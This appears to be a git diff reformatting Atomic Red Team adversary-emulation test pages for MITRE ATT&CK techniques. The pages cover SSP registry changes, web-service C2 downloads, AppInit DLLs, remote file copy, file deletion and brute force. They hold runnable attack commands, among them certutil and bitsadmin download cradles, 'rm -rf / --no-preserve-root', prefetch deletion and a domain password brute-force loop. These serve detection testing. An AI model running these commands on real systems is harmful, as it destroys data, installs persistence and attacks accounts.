diff --git a/Atomic_Threat_Coverage/Triggers/T1101.md b/Atomic_Threat_Coverage/Triggers/T1101.md
index 7739bfc4..d842090c 100644
--- a/Atomic_Threat_Coverage/Triggers/T1101.md
+++ b/Atomic_Threat_Coverage/Triggers/T1101.md
@@ -1,5 +1,7 @@ # T1101 - Security Support Provider + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1101) +
Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called. (Citation: Graeber 2014)
@@ -7,24 +9,20 @@ - [Atomic Test #1 - Modify SSP configuration in registry](#atomic-test-1---modify-ssp-configuration-in-registry) -
## Atomic Test #1 - Modify SSP configuration in registry + Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell # run these in sequence @@ -37,9 +35,4 @@ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Pack Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1102.md b/Atomic_Threat_Coverage/Triggers/T1102.md
index 3b425e71..2a11100c 100644
--- a/Atomic_Threat_Coverage/Triggers/T1102.md
+++ b/Atomic_Threat_Coverage/Triggers/T1102.md
@@ -1,12 +1,20 @@ # T1102 - Web Service + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1102) +
Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system. -These commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers. +These commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known +as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once +infected, victims will reach out to and be redirected by these resolvers. -Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. +Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the +likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, +such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service +providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. -Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
+Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while +also enabling operational resiliency (since this infrastructure may be dynamically changed). ## Atomic Tests @@ -14,48 +22,36 @@ Use of Web services may also protect back-end C2 infrastructure from discovery t - [Atomic Test #2 - Reach out to C2 Pointer URLs via powershell](#atomic-test-2---reach-out-to-c2-pointer-urls-via-powershell) -
## Atomic Test #1 - Reach out to C2 Pointer URLs via command_prompt + Download data from a public website using command line **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsadmindownload.html ``` #### Cleanup Commands: + ```cmd del %TEMP%\bitsadmindownload.html >nul 2>&1 ``` - - - -

## Atomic Test #2 - Reach out to C2 Pointer URLs via powershell + Multiple download methods for files using powershell **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Invoke-WebRequest -Uri www.twitter.com @@ -65,12 +61,9 @@ $T1102 = $wc.DownloadString("https://www.aol.com/") ``` #### Cleanup Commands: + ```powershell Clear-Variable T1102 >$null 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1103.md b/Atomic_Threat_Coverage/Triggers/T1103.md
index 8766c0a8..384c5055 100644
--- a/Atomic_Threat_Coverage/Triggers/T1103.md
+++ b/Atomic_Threat_Coverage/Triggers/T1103.md
@@ -1,73 +1,82 @@ # T1103 - AppInit DLLs + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1103) +
Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Endgame Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) -The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)
+The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: +AppInit Secure Boot) ## Atomic Tests - [Atomic Test #1 - Install AppInit Shim](#atomic-test-1---install-appinit-shim) -
## Atomic Test #1 - Install AppInit Shim -AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, -you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear. -This will happen regular as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the -AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. - -**Supported Platforms:** Windows - +AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the +system. Upon succesfully execution, +you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box +with a message of "Install AppInit Shim DLL was called!" appear. +This will happen regular as your computer starts up various applications and may in fact drive you crazy. A reliable way +to make the message box appear and verify the +AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you +don't keep getting message boxes showing up. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | registry_file | Windows Registry File | Path | PathToAtomicsFolder\T1103\src\T1103.reg| | registry_cleanup_file | Windows Registry File | Path | PathToAtomicsFolder\T1103\src\T1103-cleanup.reg| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. 
root or admin) ```cmd reg.exe import #{registry_file} ``` #### Cleanup Commands: + ```cmd reg.exe import #{registry_cleanup_file} ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) + ##### Check Prereq Commands: + ```powershell if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1103/src/T1103.reg" -OutFile "#{registry_file}" Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1103/src/T1103-cleanup.reg" -OutFile "#{registry_cleanup_file}" ``` + ##### Description: DLL's must exist in the C:\Tools directory (T1103.dll and T1103x86.dll) + ##### Check Prereq Commands: + ```powershell if ((Test-Path c:\Tools\T1103.dll) -and (Test-Path c:\Tools\T1103x86.dll)) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1103/bin/T1103.dll" -OutFile C:\Tools\T1103.dll Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1103/bin/T1103x86.dll" -OutFile C:\Tools\T1103x86.dll ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1105.md b/Atomic_Threat_Coverage/Triggers/T1105.md
index db165cc0..2b55705b 100644
--- a/Atomic_Threat_Coverage/Triggers/T1105.md
+++ b/Atomic_Threat_Coverage/Triggers/T1105.md
@@ -1,8 +1,13 @@ # T1105 - Remote File Copy + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1105) +
Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as [FTP](https://attack.mitre.org/software/S0095). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. -Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).
+Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote +Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with +authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) +or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076). ## Atomic Tests @@ -28,18 +33,16 @@ Adversaries may also copy files laterally between internal victim systems to sup - [Atomic Test #11 - OSTAP Worming Activity](#atomic-test-11---ostap-worming-activity) -
## Atomic Test #1 - rsync remote file copy (push) + Utilize rsync to perform a remote file copy (push) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | local_path | Path of folder to copy | Path | /tmp/adversary-rsync/| @@ -47,31 +50,23 @@ Utilize rsync to perform a remote file copy (push) | remote_host | Remote host to copy toward | String | victim-host| | remote_path | Remote path to receive rsync | Path | /tmp/victim-files| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} ``` - - - - -

## Atomic Test #2 - rsync remote file copy (pull) + Utilize rsync to perform a remote file copy (pull) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_path | Path of folder to copy | Path | /tmp/adversary-rsync/| @@ -79,31 +74,23 @@ Utilize rsync to perform a remote file copy (pull) | remote_host | Remote host to copy from | String | adversary-host| | local_path | Local path to receive rsync | Path | /tmp/victim-files| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} ``` - - - - -

## Atomic Test #3 - scp remote file copy (push) + Utilize scp to perform a remote file copy (push) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | local_file | Path of file to copy | Path | /tmp/adversary-scp| @@ -111,31 +98,23 @@ Utilize scp to perform a remote file copy (push) | remote_host | Remote host to copy toward | String | victim-host| | remote_path | Remote path to receive scp | Path | /tmp/victim-files/| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash scp #{local_file} #{username}@#{remote_host}:#{remote_path} ``` - - - - -

## Atomic Test #4 - scp remote file copy (pull) + Utilize scp to perform a remote file copy (pull) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | Path of file to copy | Path | /tmp/adversary-scp| @@ -143,31 +122,23 @@ Utilize scp to perform a remote file copy (pull) | remote_host | Remote host to copy from | String | adversary-host| | local_path | Local path to receive scp | Path | /tmp/victim-files/| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash scp #{username}@#{remote_host}:#{remote_file} #{local_path} ``` - - - - -

## Atomic Test #5 - sftp remote file copy (push) + Utilize sftp to perform a remote file copy (push) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | local_file | Path of file to copy | Path | /tmp/adversary-sftp| @@ -175,31 +146,23 @@ Utilize sftp to perform a remote file copy (push) | remote_host | Remote host to copy toward | String | victim-host| | remote_path | Remote path to receive sftp | Path | /tmp/victim-files/| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}' ``` - - - - -

## Atomic Test #6 - sftp remote file copy (pull) + Utilize sftp to perform a remote file copy (pull) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | Path of file to copy | Path | /tmp/adversary-sftp| @@ -207,69 +170,51 @@ Utilize sftp to perform a remote file copy (pull) | remote_host | Remote host to copy from | String | adversary-host| | local_path | Local path to receive sftp | Path | /tmp/victim-files/| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash sftp #{username}@#{remote_host}:#{remote_file} #{local_path} ``` - - - - -

## Atomic Test #7 - certutil download (urlcache) + Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | Path | Atomic-license.txt| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} ``` - - - - -

## Atomic Test #8 - certutil download (verifyctl) + Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | Path | Atomic-license.txt| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)" @@ -279,97 +224,75 @@ certutil -verifyctl -split -f #{remote_file} Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} } ``` - - - - -

## Atomic Test #9 - Windows - BITSAdmin BITS Download + This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | bits_job_name | Name of the created BITS job | String | qcxjb7| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | Path | Atomic-license.txt| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} ``` - - - - -

## Atomic Test #10 - Windows - PowerShell Download + This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | destination_path | Destination path to file | Path | $env:TEMP\Atomic-license.txt| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell (New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") ``` #### Cleanup Commands: + ```powershell Remove-Item #{destination_path} -Force -ErrorAction Ignore ``` - - - -

## Atomic Test #11 - OSTAP Worming Activity + OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | destination_path | Path to create remote file at. Default is local admin share. | String | \\localhost\C$| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd pushd #{destination_path} @@ -380,9 +303,4 @@ del AtomicTestFileT1105.js /Q >nul 2>&1 popd ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1107.md b/Atomic_Threat_Coverage/Triggers/T1107.md
index d274f425..358bbe7e 100644
--- a/Atomic_Threat_Coverage/Triggers/T1107.md
+++ b/Atomic_Threat_Coverage/Triggers/T1107.md
@@ -1,8 +1,13 @@ # T1107 - File Deletion + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1107) +
Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. -There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)
+There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as +well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion +tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack +Tools) ## Atomic Tests @@ -26,351 +31,294 @@ There are tools available from the host operating system to perform cleanup, but - [Atomic Test #10 - Delete TeamViewer Log Files](#atomic-test-10---delete-teamviewer-log-files) -
## Atomic Test #1 - Delete a single file - Linux/macOS + Delete a single file from the temporary directory **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_delete | Path of file to delete | Path | /tmp/victim-files/a| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh rm -f #{file_to_delete} ``` - - - - -

## Atomic Test #2 - Delete an entire folder - Linux/macOS + Recursively delete the temporary directory and all files contained within it **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | folder_to_delete | Path of folder to delete | Path | /tmp/victim-files| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh rm -rf #{folder_to_delete} ``` - - - - -

## Atomic Test #3 - Overwrite and delete a file with shred + Use the `shred` command to overwrite the temporary file and then delete it **Supported Platforms:** Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh shred -u #{file_to_shred} ``` - - - - -

## Atomic Test #4 - Delete a single file - Windows cmd + Delete a single file from the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1107| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd del /f #{file_to_delete} ``` - - - #### Dependencies: Run with `command_prompt`! + ##### Description: The file to delete must exist on disk at specified location (#{file_to_delete}) + ##### Check Prereq Commands: + ```cmd IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) ``` + ##### Get Prereq Commands: + ```cmd echo deleteme_T1107 >> #{file_to_delete} ``` - - -

## Atomic Test #5 - Delete an entire folder - Windows cmd + Recursively delete a folder in the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1107| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rmdir /s /q #{folder_to_delete} ``` - - - #### Dependencies: Run with `command_prompt`! + ##### Description: The file to delete must exist on disk at specified location (#{folder_to_delete}) + ##### Check Prereq Commands: + ```cmd IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) ``` + ##### Get Prereq Commands: + ```cmd mkdir #{folder_to_delete} ``` - - -

## Atomic Test #6 - Delete a single file - Windows PowerShell -Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. - -**Supported Platforms:** Windows - +Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use +File Explorer to verify the file was deleted. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_T1107| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Remove-Item -path #{file_to_delete} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: The file to delete must exist on disk at specified location (#{file_to_delete}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Path #{file_to_delete} | Out-Null ``` - - -

## Atomic Test #7 - Delete an entire folder - Windows PowerShell -Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. - -**Supported Platforms:** Windows - +Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. +Use File Explorer to verify the folder was deleted. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_folder_T1107| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Remove-Item -Path #{folder_to_delete} -Recurse ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: The folder to delete must exist on disk at specified location (#{folder_to_delete}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Path #{folder_to_delete} -Type Directory | Out-Null ``` - - -

## Atomic Test #8 - Delete Filesystem - Linux -This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. - -**Supported Platforms:** Linux - +This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid +analysis. This test is dangerous and destructive, do NOT use on production equipment. +**Supported Platforms:** Linux - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash rm -rf / --no-preserve-root > /dev/null 2> /dev/null ``` - - - - -

## Atomic Test #9 - Delete-PrefetchFile -Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count" + +Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, +Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count" before and after the test to verify that the number of prefetch files decreases by 1. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) ``` - - - - -

## Atomic Test #10 - Delete TeamViewer Log Files + Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration. -This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer -log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. +This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching +the TeamViewer +log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the +folder was deleted. https://twitter.com/SBousseaden/status/1197524463304290305?s=20 **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | teamviewer_log_file | Teamviewer log file to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\TeamViewer_54.log| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Remove-Item #{teamviewer_log_file} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Path #{teamviewer_log_file} | Out-Null ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1110.md b/Atomic_Threat_Coverage/Triggers/T1110.md
index 86471273..cca0e6d2 100644
--- a/Atomic_Threat_Coverage/Triggers/T1110.md
+++ b/Atomic_Threat_Coverage/Triggers/T1110.md
@@ -1,14 +1,27 @@ # T1110 - Brute Force + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110) +
Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained. -[Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking) +[Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an +adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to +systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow +table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. ( +Citation: Wikipedia Password cracking) -Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) +Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with +zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause +numerous authentication failures and account lockouts, depending on the organization's login failure policies. ( +Citation: Cylance Cleaver) -A related technique called password spraying uses one password (e.g. 
'Password01'), or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying) +A related technique called password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that +matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password +and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single +account with many passwords. (Citation: BlackHillsInfosec Password Spraying) -Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following: +Typically, management services over commonly used ports are used when password spraying. Commonly targeted services +include the following: * SSH (22/TCP) * Telnet (23/TCP) @@ -23,27 +36,27 @@ Typically, management services over commonly used ports are used when password s * MySQL (3306/TCP) * VNC (5900/TCP) -In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) +In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing +federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: +US-CERT TA18-068A 2018) - -In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.
+In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates +Windows "logon failure" event ID 4625. ## Atomic Tests - [Atomic Test #1 - Brute Force Credentials](#atomic-test-1---brute-force-credentials) -
## Atomic Test #1 - Brute Force Credentials + Creates username and password files then attempts to brute force on remote host **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt| @@ -51,9 +64,7 @@ Creates username and password files then attempts to brute force on remote host | remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$| | domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd net user /domain > #{input_file_users} @@ -63,9 +74,4 @@ echo "Password!" >> #{input_file_passwords} @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1112.md b/Atomic_Threat_Coverage/Triggers/T1112.md
index 70d3a1e0..6a12dff1 100644
--- a/Atomic_Threat_Coverage/Triggers/T1112.md
+++ b/Atomic_Threat_Coverage/Triggers/T1112.md
